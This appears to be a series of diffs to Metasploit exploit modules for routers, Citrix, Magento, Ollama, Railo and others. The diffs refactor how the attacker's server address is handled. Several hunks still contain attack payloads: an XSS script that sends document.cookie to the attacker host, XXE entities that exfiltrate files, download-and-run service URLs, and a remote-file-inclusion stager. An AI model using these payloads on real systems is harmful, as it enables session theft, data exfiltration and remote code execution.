-        OptAddressRoutable.new('SRVHOST', [false, 'The local host to listen on and use for incoming connections']),
         OptPort.new('SRVPORT', [true, 'The local port to listen on.', 3010])
       ]
     )

--- a/modules/exploits/freebsd/misc/citrix_netscaler_soap_bof.rb
+++ b/modules/exploits/freebsd/misc/citrix_netscaler_soap_bof.rb
@@ -72,7 +72,7 @@ class MetasploitModule < Msf::Exploit::Remote
     register_options(
       [
         OptString.new('TARGETURI', [true, 'The base path to the soap handler', '/soap']),
-        OptAddress.new('SRVHOST', [true, 'The local host to listen on. This must be an address on the local machine reachable by the target', ]),
+        OptAddressRoutable.new('SRVHOST', [true, 'The local host to listen on and use for incoming connections.', Rex::Socket.source_address]),
         OptPort.new('SRVPORT', [true, 'The local port to listen on.', 3010])
       ]
     )
@@ -92,10 +92,6 @@ class MetasploitModule < Msf::Exploit::Remote
   end
 
   def exploit
-    if ['0.0.0.0', '127.0.0.1'].include?(datastore['SRVHOST'])
-      fail_with(Failure::BadConfig, 'Bad SRVHOST, use an address on the local machine reachable by the target')
-    end
-
     if check != Exploit::CheckCode::Detected
       fail_with(Failure::NoTarget, "#{peer} - SOAP endpoint not found")
     end

--- a/modules/exploits/freebsd/misc/citrix_netscaler_soap_bof.rb
+++ b/modules/exploits/freebsd/misc/citrix_netscaler_soap_bof.rb
@@ -123,9 +123,9 @@ class MetasploitModule < Msf::Exploit::Remote
       <ns7744:login xmlns:ns7744="urn:NSConfig">
       <username xsi:type="xsd:string">nsroot</username>
       <password xsi:type="xsd:string">nsroot</password>
-      <clientip xsi:type="xsd:string">#{datastore['SRVHOST']}</clientip>
+      <clientip xsi:type="xsd:string">#{srvhost}</clientip>
       <cookieTimeout xsi:type="xsd:int">1800</cookieTimeout>
-      <ns xsi:type="xsd:string">#{datastore['SRVHOST']}</ns>
+      <ns xsi:type="xsd:string">#{srvhost}</ns>
       </ns7744:login>
       </SOAP-ENV:Body>
       </SOAP-ENV:Envelope>

--- a/modules/exploits/linux/http/chaos_rat_xss_to_rce.rb
+++ b/modules/exploits/linux/http/chaos_rat_xss_to_rce.rb
@@ -72,7 +72,7 @@ class MetasploitModule < Msf::Exploit::Remote
     register_options(
       [
         Opt::RPORT(8080),
-        OptAddressRoutable.new('SRVHOST', [true, 'The local host to listen on and use for incoming connections.', Rex::Socket.source_address]),
+        OptAddressRoutable.new('SRVHOST', [false, 'The local host to listen on and use for incoming connections']),
         OptString.new('USERNAME', [ false, 'User to login with']), # admin
         OptString.new('PASSWORD', [ false, 'Password to login with']), # admin
         OptString.new('TARGETURI', [ true, 'The URI of the Chaos Application', '/']),
@@ -212,7 +212,7 @@ class MetasploitModule < Msf::Exploit::Remote
       data = {
         'client_id' => mac_address,
         # removed the rickroll from the PoC :(
-        'response' => convert_to_int_array("</pre><script>var i = new Image;i.src='http://#{srvhost}:#{datastore['SRVPORT']}/'+document.cookie;</script>"),
+        'response' => convert_to_int_array("</pre><script>var i = new Image;i.src='#{get_uri}/'+document.cookie;</script>"),
         'has_error' => false
       }
       wsock.put_wsbinary(JSON.generate(data))

--- a/modules/exploits/linux/http/chaos_rat_xss_to_rce.rb
+++ b/modules/exploits/linux/http/chaos_rat_xss_to_rce.rb
@@ -72,6 +72,7 @@ class MetasploitModule < Msf::Exploit::Remote
     register_options(
       [
         Opt::RPORT(8080),
+        OptAddressRoutable.new('SRVHOST', [true, 'The local host to listen on and use for incoming connections.', Rex::Socket.source_address]),
         OptString.new('USERNAME', [ false, 'User to login with']), # admin
         OptString.new('PASSWORD', [ false, 'Password to login with']), # admin
         OptString.new('TARGETURI', [ true, 'The URI of the Chaos Application', '/']),
@@ -362,7 +363,6 @@ class MetasploitModule < Msf::Exploit::Remote
            datastore['AGENT']
       fail_with(Failure::BadConfig, 'Username and password, or JWT, or AGENT path required')
     end
-    fail_with(Failure::BadConfig, 'SRVHOST can not be 0.0.0.0, must be a valid IP address') if Rex::Socket.addr_atoi(datastore['SRVHOST']) == 0
 
     @xss_response_received = false
 

--- a/modules/exploits/linux/http/chaos_rat_xss_to_rce.rb
+++ b/modules/exploits/linux/http/chaos_rat_xss_to_rce.rb
@@ -212,7 +212,7 @@ class MetasploitModule < Msf::Exploit::Remote
       data = {
         'client_id' => mac_address,
         # removed the rickroll from the PoC :(
-        'response' => convert_to_int_array("</pre><script>var i = new Image;i.src='http://#{datastore['SRVHOST']}:#{datastore['SRVPORT']}/'+document.cookie;</script>"),
+        'response' => convert_to_int_array("</pre><script>var i = new Image;i.src='http://#{srvhost}:#{datastore['SRVPORT']}/'+document.cookie;</script>"),
         'has_error' => false
       }
       wsock.put_wsbinary(JSON.generate(data))
@@ -239,7 +239,7 @@ class MetasploitModule < Msf::Exploit::Remote
         os_name: datastore['AGENT_OS'],
         os_arch: 'amd64',
         mac_address: mac_address,
-        local_ip_address: datastore['SRVHOST'],
+        local_ip_address: srvhost,
         port: datastore['SRVPORT'].to_s,
         fetched_unix: Time.now.to_i
       }

--- a/modules/exploits/linux/http/chaos_rat_xss_to_rce.rb
+++ b/modules/exploits/linux/http/chaos_rat_xss_to_rce.rb
@@ -72,7 +72,6 @@ class MetasploitModule < Msf::Exploit::Remote
     register_options(
       [
         Opt::RPORT(8080),
-        OptAddressRoutable.new('SRVHOST', [false, 'The local host to listen on and use for incoming connections']),
         OptString.new('USERNAME', [ false, 'User to login with']), # admin
         OptString.new('PASSWORD', [ false, 'Password to login with']), # admin
         OptString.new('TARGETURI', [ true, 'The URI of the Chaos Application', '/']),

--- a/modules/exploits/linux/http/craftcms_ftp_template.rb
+++ b/modules/exploits/linux/http/craftcms_ftp_template.rb
@@ -189,7 +189,7 @@ class MetasploitModule < Msf::Exploit::Remote
 
   def trigger_http_request
     vprint_status('Triggering HTTP request...')
-    templates_path = "ftp://#{srvhost}:#{datastore['SRVPORT']}"
+    templates_path = "ftp://#{Rex::Socket.to_authority(srvhost_addr, srvport)}"
     send_request_raw(
       'uri' => normalize_uri(target_uri.path) + "?--templatesPath=#{templates_path}",
       'method' => 'GET'

--- a/modules/exploits/linux/http/craftcms_ftp_template.rb
+++ b/modules/exploits/linux/http/craftcms_ftp_template.rb
@@ -189,7 +189,7 @@ class MetasploitModule < Msf::Exploit::Remote
 
   def trigger_http_request
     vprint_status('Triggering HTTP request...')
-    templates_path = "ftp://#{datastore['SRVHOST']}:#{datastore['SRVPORT']}"
+    templates_path = "ftp://#{srvhost}:#{datastore['SRVPORT']}"
     send_request_raw(
       'uri' => normalize_uri(target_uri.path) + "?--templatesPath=#{templates_path}",
       'method' => 'GET'
@@ -212,7 +212,7 @@ class MetasploitModule < Msf::Exploit::Remote
   def exploit
     vprint_status('Starting FTP service...')
     start_ftp_service
-    vprint_status("FTP server started on #{datastore['SRVHOST']}:#{datastore['SRVPORT']}")
+    vprint_status("FTP server started on #{srvhost}:#{datastore['SRVPORT']}")
     vprint_status('Sending HTTP request to trigger the payload...')
     trigger_http_request
   end

--- a/modules/exploits/linux/http/dlink_diagnostic_exec_noauth.rb
+++ b/modules/exploits/linux/http/dlink_diagnostic_exec_noauth.rb
@@ -125,18 +125,9 @@ class MetasploitModule < Msf::Exploit::Remote
     if (datastore['DOWNHOST'])
       service_url = 'http://' + datastore['DOWNHOST'] + ':' + datastore['SRVPORT'].to_s + resource_uri
     else
+      service_url = "http://#{Rex::Socket.to_authority(srvhost_addr, srvport)}" + resource_uri
 
-      # we use SRVHOST as download IP for the coming wget command.
-      # SRVHOST needs a real IP address of our download host
-      if (srvhost == '0.0.0.0' or srvhost == '::')
-        srv_host = Rex::Socket.source_address(rhost)
-      else
-        srv_host = srvhost
-      end
-
-      service_url = 'http://' + srv_host + ':' + datastore['SRVPORT'].to_s + resource_uri
-
-      print_status("#{rhost}:#{rport} - Starting up our web service on #{service_url} ...")
+      print_status("#{rhost}:#{rport} - Starting up our web service on http://#{Rex::Socket.to_authority(bindhost, bindport)}/#{resource_uri}...")
       start_service({
         'Uri' => {
           'Proc' => proc do |cli, req|
@@ -146,7 +137,6 @@ class MetasploitModule < Msf::Exploit::Remote
         },
         'ssl' => false # do not use SSL
       })
-
     end
 
     #

--- a/modules/exploits/linux/http/dlink_diagnostic_exec_noauth.rb
+++ b/modules/exploits/linux/http/dlink_diagnostic_exec_noauth.rb
@@ -128,10 +128,10 @@ class MetasploitModule < Msf::Exploit::Remote
 
       # we use SRVHOST as download IP for the coming wget command.
       # SRVHOST needs a real IP address of our download host
-      if (datastore['SRVHOST'] == '0.0.0.0' or datastore['SRVHOST'] == '::')
+      if (srvhost == '0.0.0.0' or srvhost == '::')
         srv_host = Rex::Socket.source_address(rhost)
       else
-        srv_host = datastore['SRVHOST']
+        srv_host = srvhost
       end
 
       service_url = 'http://' + srv_host + ':' + datastore['SRVPORT'].to_s + resource_uri

--- a/modules/exploits/linux/http/dlink_dir615_up_exec.rb
+++ b/modules/exploits/linux/http/dlink_dir615_up_exec.rb
@@ -159,15 +159,8 @@ class MetasploitModule < Msf::Exploit::Remote
     if (datastore['DOWNHOST'])
       service_url = 'http://' + datastore['DOWNHOST'] + ':' + datastore['SRVPORT'].to_s + resource_uri
     else
-
-      if (srvhost == '0.0.0.0' or srvhost == '::')
-        srv_host = Rex::Socket.source_address(rhost)
-      else
-        srv_host = srvhost
-      end
-
-      service_url = 'http://' + srv_host + ':' + datastore['SRVPORT'].to_s + resource_uri
-      print_status("#{rhost}:#{rport} - Starting up our web service on #{service_url} ...")
+      service_url = 'http://' + srvhost_addr + ':' + datastore['SRVPORT'].to_s + resource_uri
+      print_status("#{rhost}:#{rport} - Starting up our web service on http://#{Rex::Socket.to_authority(bindhost, bindport)}/#{resource_uri}...")
       start_service({
         'Uri' => {
           'Proc' => proc do |cli, req|

--- a/modules/exploits/linux/http/dlink_dir615_up_exec.rb
+++ b/modules/exploits/linux/http/dlink_dir615_up_exec.rb
@@ -160,10 +160,10 @@ class MetasploitModule < Msf::Exploit::Remote
       service_url = 'http://' + datastore['DOWNHOST'] + ':' + datastore['SRVPORT'].to_s + resource_uri
     else
 
-      if (datastore['SRVHOST'] == '0.0.0.0' or datastore['SRVHOST'] == '::')
+      if (srvhost == '0.0.0.0' or srvhost == '::')
         srv_host = Rex::Socket.source_address(rhost)
       else
-        srv_host = datastore['SRVHOST']
+        srv_host = srvhost
       end
 
       service_url = 'http://' + srv_host + ':' + datastore['SRVPORT'].to_s + resource_uri

--- a/modules/exploits/linux/http/dlink_hnap_login_bof.rb
+++ b/modules/exploits/linux/http/dlink_hnap_login_bof.rb
@@ -262,14 +262,8 @@ class MetasploitModule < Msf::Exploit::Remote
       @elf_sent = false
       resource_uri = '/' + downfile
 
-      if (srvhost == "0.0.0.0" or srvhost == "::")
-        srv_host = Rex::Socket.source_address(rhost)
-      else
-        srv_host = srvhost
-      end
-
-      service_url = 'http://' + srv_host + ':' + datastore['SRVPORT'].to_s + resource_uri
-      print_status("#{peer} - Starting up our web service on #{service_url} ...")
+      service_url = 'http://' + srvhost_addr + ':' + datastore['SRVPORT'].to_s + resource_uri
+      print_status("#{rhost}:#{rport} - Starting up our web service on http://#{Rex::Socket.to_authority(bindhost, bindport)}/#{resource_uri}...")
       start_service({
         'Uri' => {
           'Proc' => Proc.new { |cli, req|

--- a/modules/exploits/linux/http/dlink_hnap_login_bof.rb
+++ b/modules/exploits/linux/http/dlink_hnap_login_bof.rb
@@ -262,10 +262,10 @@ class MetasploitModule < Msf::Exploit::Remote
       @elf_sent = false
       resource_uri = '/' + downfile
 
-      if (datastore['SRVHOST'] == "0.0.0.0" or datastore['SRVHOST'] == "::")
+      if (srvhost == "0.0.0.0" or srvhost == "::")
         srv_host = Rex::Socket.source_address(rhost)
       else
-        srv_host = datastore['SRVHOST']
+        srv_host = srvhost
       end
 
       service_url = 'http://' + srv_host + ':' + datastore['SRVPORT'].to_s + resource_uri

--- a/modules/exploits/linux/http/huawei_hg532n_cmdinject.rb
+++ b/modules/exploits/linux/http/huawei_hg532n_cmdinject.rb
@@ -471,10 +471,10 @@ class MetasploitModule < Msf::Exploit::Remote
     srv_host =
       if datastore['DOWNHOST']
         datastore['DOWNHOST']
-      elsif datastore['SRVHOST'] == '0.0.0.0' || datastore['SRVHOST'] == '::'
+      elsif srvhost == '0.0.0.0' || srvhost == '::'
         Rex::Socket.source_address(rhost)
       else
-        datastore['SRVHOST']
+        srvhost
       end
 
     srv_port = datastore['SRVPORT'].to_s

--- a/modules/exploits/linux/http/huawei_hg532n_cmdinject.rb
+++ b/modules/exploits/linux/http/huawei_hg532n_cmdinject.rb
@@ -469,12 +469,10 @@ class MetasploitModule < Msf::Exploit::Remote
   #
   def download_and_run_payload(payload_uri)
     srv_host =
-      if datastore['DOWNHOST']
+      if datastore['DOWNHOST'].present?
         datastore['DOWNHOST']
-      elsif srvhost == '0.0.0.0' || srvhost == '::'
-        Rex::Socket.source_address(rhost)
       else
-        srvhost
+        srvhost_addr
       end
 
     srv_port = datastore['SRVPORT'].to_s

--- a/modules/exploits/linux/http/ibm_qradar_unauth_rce.rb
+++ b/modules/exploits/linux/http/ibm_qradar_unauth_rce.rb
@@ -146,16 +146,10 @@ class MetasploitModule < Msf::Exploit::Remote
     @payload_name = rand_text_alpha_lower(3..5)
     root_payload = rand_text_alpha_lower(3..5)
 
-    if (srvhost == "0.0.0.0" or srvhost == "::")
-      srv_host = Rex::Socket.source_address(rhost)
-    else
-      srv_host = srvhost
-    end
-
-    http_service = (datastore['SSL'] ? 'https://' : 'http://') + srv_host + ':' + datastore['SRVPORT'].to_s
+    http_service = (datastore['SSL'] ? 'https://' : 'http://') + srvhost_addr + ':' + datastore['SRVPORT'].to_s
     service_uri = http_service + '/' + @payload_name
 
-    print_status("#{peer} - Starting up our web service on #{http_service} ...")
+    print_status("#{peer} - Starting up our web service...")
     start_service({
       'Uri' => {
         'Proc' => Proc.new { |cli, req|

--- a/modules/exploits/linux/http/ibm_qradar_unauth_rce.rb
+++ b/modules/exploits/linux/http/ibm_qradar_unauth_rce.rb
@@ -146,10 +146,10 @@ class MetasploitModule < Msf::Exploit::Remote
     @payload_name = rand_text_alpha_lower(3..5)
     root_payload = rand_text_alpha_lower(3..5)
 
-    if (datastore['SRVHOST'] == "0.0.0.0" or datastore['SRVHOST'] == "::")
+    if (srvhost == "0.0.0.0" or srvhost == "::")
       srv_host = Rex::Socket.source_address(rhost)
     else
-      srv_host = datastore['SRVHOST']
+      srv_host = srvhost
     end
 
     http_service = (datastore['SSL'] ? 'https://' : 'http://') + srv_host + ':' + datastore['SRVPORT'].to_s

--- a/modules/exploits/linux/http/linksys_e1500_apply_exec.rb
+++ b/modules/exploits/linux/http/linksys_e1500_apply_exec.rb
@@ -158,10 +158,10 @@ class MetasploitModule < Msf::Exploit::Remote
 
       # we use SRVHOST as download IP for the coming wget command.
       # SRVHOST needs a real IP address of our download host
-      if (datastore['SRVHOST'] == '0.0.0.0' or datastore['SRVHOST'] == '::')
+      if (srvhost == '0.0.0.0' or srvhost == '::')
         srv_host = Rex::Socket.source_address(rhost)
       else
-        srv_host = datastore['SRVHOST']
+        srv_host = srvhost
       end
 
       service_url = 'http://' + srv_host + ':' + datastore['SRVPORT'].to_s + resource_uri

--- a/modules/exploits/linux/http/linksys_e1500_apply_exec.rb
+++ b/modules/exploits/linux/http/linksys_e1500_apply_exec.rb
@@ -155,17 +155,8 @@ class MetasploitModule < Msf::Exploit::Remote
     if (datastore['DOWNHOST'])
       service_url = 'http://' + datastore['DOWNHOST'] + ':' + datastore['SRVPORT'].to_s + resource_uri
     else
-
-      # we use SRVHOST as download IP for the coming wget command.
-      # SRVHOST needs a real IP address of our download host
-      if (srvhost == '0.0.0.0' or srvhost == '::')
-        srv_host = Rex::Socket.source_address(rhost)
-      else
-        srv_host = srvhost
-      end
-
-      service_url = 'http://' + srv_host + ':' + datastore['SRVPORT'].to_s + resource_uri
-      print_status("#{rhost}:#{rport} - Starting up our web service on #{service_url} ...")
+      service_url = 'http://' + srvhost_addr + ':' + srvport.to_s + resource_uri
+      print_status("#{rhost}:#{rport} - Starting up our web service on http://#{Rex::Socket.to_authority(bindhost, bindport)}/#{resource_uri}...")
       start_service({
         'Uri' => {
           'Proc' => proc do |cli, req|

--- a/modules/exploits/linux/http/linksys_wrt54gl_apply_exec.rb
+++ b/modules/exploits/linux/http/linksys_wrt54gl_apply_exec.rb
@@ -309,10 +309,10 @@ class MetasploitModule < Msf::Exploit::Remote
 
       # we use SRVHOST as download IP for the coming wget command.
       # SRVHOST needs a real IP address of our download host
-      if (datastore['SRVHOST'] == '0.0.0.0' or datastore['SRVHOST'] == '::')
+      if (srvhost == '0.0.0.0' or srvhost == '::')
         srv_host = Rex::Socket.source_address(rhost)
       else
-        srv_host = datastore['SRVHOST']
+        srv_host = srvhost
       end
 
       service_url = 'http://' + srv_host + ':' + datastore['SRVPORT'].to_s + resource_uri

--- a/modules/exploits/linux/http/linksys_wrt54gl_apply_exec.rb
+++ b/modules/exploits/linux/http/linksys_wrt54gl_apply_exec.rb
@@ -306,17 +306,8 @@ class MetasploitModule < Msf::Exploit::Remote
     if (datastore['DOWNHOST'])
       service_url = 'http://' + datastore['DOWNHOST'] + ':' + datastore['SRVPORT'].to_s + resource_uri
     else
-
-      # we use SRVHOST as download IP for the coming wget command.
-      # SRVHOST needs a real IP address of our download host
-      if (srvhost == '0.0.0.0' or srvhost == '::')
-        srv_host = Rex::Socket.source_address(rhost)
-      else
-        srv_host = srvhost
-      end
-
-      service_url = 'http://' + srv_host + ':' + datastore['SRVPORT'].to_s + resource_uri
-      print_status("#{rhost}:#{rport} - Starting up our web service on #{service_url} ...")
+      service_url = 'http://' + srvhost_addr + ':' + datastore['SRVPORT'].to_s + resource_uri
+      print_status("#{rhost}:#{rport} - Starting up our web service on http://#{Rex::Socket.to_authority(bindhost, bindport)}/#{resource_uri}...")
       start_service({
         'Uri' => {
           'Proc' => proc do |cli, req|

--- a/modules/exploits/linux/http/magento_xxe_to_glibc_buf_overflow.rb
+++ b/modules/exploits/linux/http/magento_xxe_to_glibc_buf_overflow.rb
@@ -215,7 +215,7 @@ class MetasploitModule < Msf::Exploit::Remote
     xml += "<!DOCTYPE #{Rex::Text.rand_text_alpha_lower(4..8)}"
     xml += '['
     xml += "  <!ELEMENT #{Rex::Text.rand_text_alpha_lower(4..8)} ANY >"
-    xml += "    <!ENTITY % #{system_entity} SYSTEM \"http://#{datastore['SRVHOST']}:#{datastore['SRVPORT']}/#{@url_file}/#{@filter_path}\"> %#{system_entity}; %#{@xxe_param};  "
+    xml += "    <!ENTITY % #{system_entity} SYSTEM \"http://#{srvhost}:#{datastore['SRVPORT']}/#{@url_file}/#{@filter_path}\"> %#{system_entity}; %#{@xxe_param};  "
     xml += ']'
     xml += "> <r>&#{@xxe_exfil};</r>"
 
@@ -606,7 +606,7 @@ class MetasploitModule < Msf::Exploit::Remote
       data = Rex::Text.rand_text_alpha_lower(4..8)
       response = "
 <!ENTITY % #{data} SYSTEM \"#{path}\">
-<!ENTITY % #{@xxe_param} \"<!ENTITY #{@xxe_exfil} SYSTEM 'http://#{datastore['SRVHOST']}:#{datastore['SRVPORT']}/#{@url_data}/%#{data};'>\">"
+<!ENTITY % #{@xxe_param} \"<!ENTITY #{@xxe_exfil} SYSTEM 'http://#{srvhost}:#{datastore['SRVPORT']}/#{@url_data}/%#{data};'>\">"
       send_response(cli, response)
     when @url_data
       @file_data = Rex::Text.decode_base64(Rex::Text.decode_base64(req.uri.sub(%r{^/#{@url_data}/}, '')))

--- a/modules/exploits/linux/http/magento_xxe_to_glibc_buf_overflow.rb
+++ b/modules/exploits/linux/http/magento_xxe_to_glibc_buf_overflow.rb
@@ -87,7 +87,6 @@ class MetasploitModule < Msf::Exploit::Remote
 
     register_options(
       [
-        OptAddressRoutable.new('SRVHOST', [false, 'The local host to listen on and use for incoming connections']),
         OptString.new('TARGETURI', [ true, 'The base path to the web application', '/']),
         OptInt.new('DOWNLOAD_FILE_TIMEOUT', [ true, 'The amount of time to wait for the XXE to return the file requested', 10]),
       ]

--- a/modules/exploits/linux/http/magento_xxe_to_glibc_buf_overflow.rb
+++ b/modules/exploits/linux/http/magento_xxe_to_glibc_buf_overflow.rb
@@ -87,6 +87,7 @@ class MetasploitModule < Msf::Exploit::Remote
 
     register_options(
       [
+        OptAddressRoutable.new('SRVHOST', [true, 'The local host to listen on and use for incoming connections.', Rex::Socket.source_address]),
         OptString.new('TARGETURI', [ true, 'The base path to the web application', '/']),
         OptInt.new('DOWNLOAD_FILE_TIMEOUT', [ true, 'The amount of time to wait for the XXE to return the file requested', 10]),
       ]
@@ -557,10 +558,6 @@ class MetasploitModule < Msf::Exploit::Remote
     @xxe_exfil = Rex::Text.rand_text_alpha_lower(4..8)
     @info = Hash.new
     @module_setup_complete = true
-
-    if datastore['SRVHOST'] == '0.0.0.0' || datastore['SRVHOST'] == '::'
-      fail_with(Failure::BadConfig, 'SRVHOST must be set to an IP address (0.0.0.0 is invalid) for exploitation to be successful')
-    end
 
     start_service({
       'Uri' => {

--- a/modules/exploits/linux/http/magento_xxe_to_glibc_buf_overflow.rb
+++ b/modules/exploits/linux/http/magento_xxe_to_glibc_buf_overflow.rb
@@ -87,7 +87,7 @@ class MetasploitModule < Msf::Exploit::Remote
 
     register_options(
       [
-        OptAddressRoutable.new('SRVHOST', [true, 'The local host to listen on and use for incoming connections.', Rex::Socket.source_address]),
+        OptAddressRoutable.new('SRVHOST', [false, 'The local host to listen on and use for incoming connections']),
         OptString.new('TARGETURI', [ true, 'The base path to the web application', '/']),
         OptInt.new('DOWNLOAD_FILE_TIMEOUT', [ true, 'The amount of time to wait for the XXE to return the file requested', 10]),
       ]
@@ -215,7 +215,7 @@ class MetasploitModule < Msf::Exploit::Remote
     xml += "<!DOCTYPE #{Rex::Text.rand_text_alpha_lower(4..8)}"
     xml += '['
     xml += "  <!ELEMENT #{Rex::Text.rand_text_alpha_lower(4..8)} ANY >"
-    xml += "    <!ENTITY % #{system_entity} SYSTEM \"http://#{srvhost}:#{datastore['SRVPORT']}/#{@url_file}/#{@filter_path}\"> %#{system_entity}; %#{@xxe_param};  "
+    xml += "    <!ENTITY % #{system_entity} SYSTEM \"http://#{srvhost_addr}:#{srvport}/#{@url_file}/#{@filter_path}\"> %#{system_entity}; %#{@xxe_param};  "
     xml += ']'
     xml += "> <r>&#{@xxe_exfil};</r>"
 
@@ -606,7 +606,7 @@ class MetasploitModule < Msf::Exploit::Remote
       data = Rex::Text.rand_text_alpha_lower(4..8)
       response = "
 <!ENTITY % #{data} SYSTEM \"#{path}\">
-<!ENTITY % #{@xxe_param} \"<!ENTITY #{@xxe_exfil} SYSTEM 'http://#{srvhost}:#{datastore['SRVPORT']}/#{@url_data}/%#{data};'>\">"
+<!ENTITY % #{@xxe_param} \"<!ENTITY #{@xxe_exfil} SYSTEM 'http://#{srvhost_addr}:#{srvport}/#{@url_data}/%#{data};'>\">"
       send_response(cli, response)
     when @url_data
       @file_data = Rex::Text.decode_base64(Rex::Text.decode_base64(req.uri.sub(%r{^/#{@url_data}/}, '')))

--- a/modules/exploits/linux/http/netgear_dgn1000b_setup_exec.rb
+++ b/modules/exploits/linux/http/netgear_dgn1000b_setup_exec.rb
@@ -160,17 +160,8 @@ class MetasploitModule < Msf::Exploit::Remote
     if (datastore['DOWNHOST'])
       service_url = 'http://' + datastore['DOWNHOST'] + ':' + datastore['SRVPORT'].to_s + resource_uri
     else
-
-      # we use SRVHOST as download IP for the coming wget command.
-      # SRVHOST needs a real IP address of our download host
-      if (srvhost == '0.0.0.0' or srvhost == '::')
-        srv_host = Rex::Socket.source_address(rhost)
-      else
-        srv_host = srvhost
-      end
-
-      service_url = 'http://' + srv_host + ':' + datastore['SRVPORT'].to_s + resource_uri
-      print_status("#{rhost}:#{rport} - Starting up our web service on #{service_url} ...")
+      service_url = 'http://' + srvhost_addr + ':' + datastore['SRVPORT'].to_s + resource_uri
+      print_status("#{rhost}:#{rport} - Starting up our web service on http://#{Rex::Socket.to_authority(bindhost, bindport)}/#{resource_uri}...")
       start_service({
         'Uri' => {
           'Proc' => proc do |cli, req|

--- a/modules/exploits/linux/http/netgear_dgn1000b_setup_exec.rb
+++ b/modules/exploits/linux/http/netgear_dgn1000b_setup_exec.rb
@@ -163,10 +163,10 @@ class MetasploitModule < Msf::Exploit::Remote
 
       # we use SRVHOST as download IP for the coming wget command.
       # SRVHOST needs a real IP address of our download host
-      if (datastore['SRVHOST'] == '0.0.0.0' or datastore['SRVHOST'] == '::')
+      if (srvhost == '0.0.0.0' or srvhost == '::')
         srv_host = Rex::Socket.source_address(rhost)
       else
-        srv_host = datastore['SRVHOST']
+        srv_host = srvhost
       end
 
       service_url = 'http://' + srv_host + ':' + datastore['SRVPORT'].to_s + resource_uri

--- a/modules/exploits/linux/http/netgear_dgn2200b_pppoe_exec.rb
+++ b/modules/exploits/linux/http/netgear_dgn2200b_pppoe_exec.rb
@@ -273,17 +273,8 @@ class MetasploitModule < Msf::Exploit::Remote
     if (datastore['DOWNHOST'])
       service_url = 'http://' + datastore['DOWNHOST'] + ':' + datastore['SRVPORT'].to_s + resource_uri
     else
-
-      # we use SRVHOST as download IP for the coming wget command.
-      # SRVHOST needs a real IP address of our download host
-      if (srvhost == '0.0.0.0' or srvhost == '::')
-        srv_host = Rex::Socket.source_address(rhost)
-      else
-        srv_host = srvhost
-      end
-
-      service_url = 'http://' + srv_host + ':' + datastore['SRVPORT'].to_s + resource_uri
-      print_status("#{rhost}:#{rport} - Starting up our web service on #{service_url} ...")
+      service_url = 'http://' + srvhost_addr + ':' + datastore['SRVPORT'].to_s + resource_uri
+      print_status("#{rhost}:#{rport} - Starting up our web service on http://#{Rex::Socket.to_authority(bindhost, bindport)}/#{resource_uri}...")
       start_service({
         'Uri' => {
           'Proc' => proc do |cli, req|

--- a/modules/exploits/linux/http/netgear_dgn2200b_pppoe_exec.rb
+++ b/modules/exploits/linux/http/netgear_dgn2200b_pppoe_exec.rb
@@ -276,10 +276,10 @@ class MetasploitModule < Msf::Exploit::Remote
 
       # we use SRVHOST as download IP for the coming wget command.
       # SRVHOST needs a real IP address of our download host
-      if (datastore['SRVHOST'] == '0.0.0.0' or datastore['SRVHOST'] == '::')
+      if (srvhost == '0.0.0.0' or srvhost == '::')
         srv_host = Rex::Socket.source_address(rhost)
       else
-        srv_host = datastore['SRVHOST']
+        srv_host = srvhost
       end
 
       service_url = 'http://' + srv_host + ':' + datastore['SRVPORT'].to_s + resource_uri

--- a/modules/exploits/linux/http/ollama_rce_cve_2024_37032.rb
+++ b/modules/exploits/linux/http/ollama_rce_cve_2024_37032.rb
@@ -167,15 +167,11 @@ class MetasploitModule < Msf::Exploit::Remote
 
   def start_registry
     start_service({ 'Uri' => { 'Proc' => method(:on_request_uri), 'Path' => '/' } })
-    print_status("Rogue OCI registry on #{srvhost_addr}:#{datastore['SRVPORT']}")
-  end
-
-  def srvhost_addr
-    datastore['SRVHOST']
+    print_status("Rogue OCI registry on #{Rex::Socket.to_authority(bindhost, bindport)}")
   end
 
   def registry_model_name(namespace)
-    "#{srvhost_addr}:#{datastore['SRVPORT']}/#{namespace}/model"
+    "#{srvhost_addr}:#{srvport}/#{namespace}/model"
   end
 
   def on_request_uri(cli, request)

--- a/modules/exploits/linux/http/railo_cfml_rfi.rb
+++ b/modules/exploits/linux/http/railo_cfml_rfi.rb
@@ -63,7 +63,6 @@ class MetasploitModule < Msf::Exploit::Remote
 
     register_options(
       [
-        OptAddressRoutable.new('SRVHOST', [false, 'The local host to listen on and use for incoming connections']),
         OptString.new('TARGETURI', [true, 'The base URI of the Railo server', '/railo-context/']),
         OptInt.new('STAGEWAIT', [true, 'Number of seconds to wait for stager to download', 10])
       ]

--- a/modules/exploits/linux/http/railo_cfml_rfi.rb
+++ b/modules/exploits/linux/http/railo_cfml_rfi.rb
@@ -63,7 +63,7 @@ class MetasploitModule < Msf::Exploit::Remote
 
     register_options(
       [
-        OptAddressRoutable.new('SRVHOST', [true, 'The local host to listen on and use for incoming connections.', Rex::Socket.source_address]),
+        OptAddressRoutable.new('SRVHOST', [false, 'The local host to listen on and use for incoming connections']),
         OptString.new('TARGETURI', [true, 'The base URI of the Railo server', '/railo-context/']),
         OptInt.new('STAGEWAIT', [true, 'Number of seconds to wait for stager to download', 10])
       ]
@@ -91,7 +91,7 @@ class MetasploitModule < Msf::Exploit::Remote
   end
 
   def exploit
-    url = 'http://' + Rex::Socket.to_authority(srvhost, srvport)
+    url = 'http://' + Rex::Socket.to_authority(srvhost_addr, srvport)
 
     @shell_name = Rex::Text.rand_text_alpha(15)
     stager_name = Rex::Text.rand_text_alpha(15) + '.cfm'
@@ -164,7 +164,9 @@ class MetasploitModule < Msf::Exploit::Remote
   end
 
   def on_request_stager(cli, _request)
-    url = 'http://' + srvhost + ':' + datastore['SRVPORT'].to_s + '/' + @shell_name
+    url = get_uri(cli)
+    url << '/' unless url.end_with?('/')
+    url << @shell_name
 
     stager = "<cfhttp method='get' url='#{url}'"
     stager << " path='#GetDirectoryFromPath(GetCurrentTemplatePath())#..\\..\\..\\..\\..\\..\\'"

--- a/modules/exploits/linux/http/railo_cfml_rfi.rb
+++ b/modules/exploits/linux/http/railo_cfml_rfi.rb
@@ -63,6 +63,7 @@ class MetasploitModule < Msf::Exploit::Remote
 
     register_options(
       [
+        OptAddressRoutable.new('SRVHOST', [true, 'The local host to listen on and use for incoming connections.', Rex::Socket.source_address]),
         OptString.new('TARGETURI', [true, 'The base URI of the Railo server', '/railo-context/']),
         OptInt.new('STAGEWAIT', [true, 'Number of seconds to wait for stager to download', 10])
       ]
@@ -90,11 +91,7 @@ class MetasploitModule < Msf::Exploit::Remote
   end
 
   def exploit
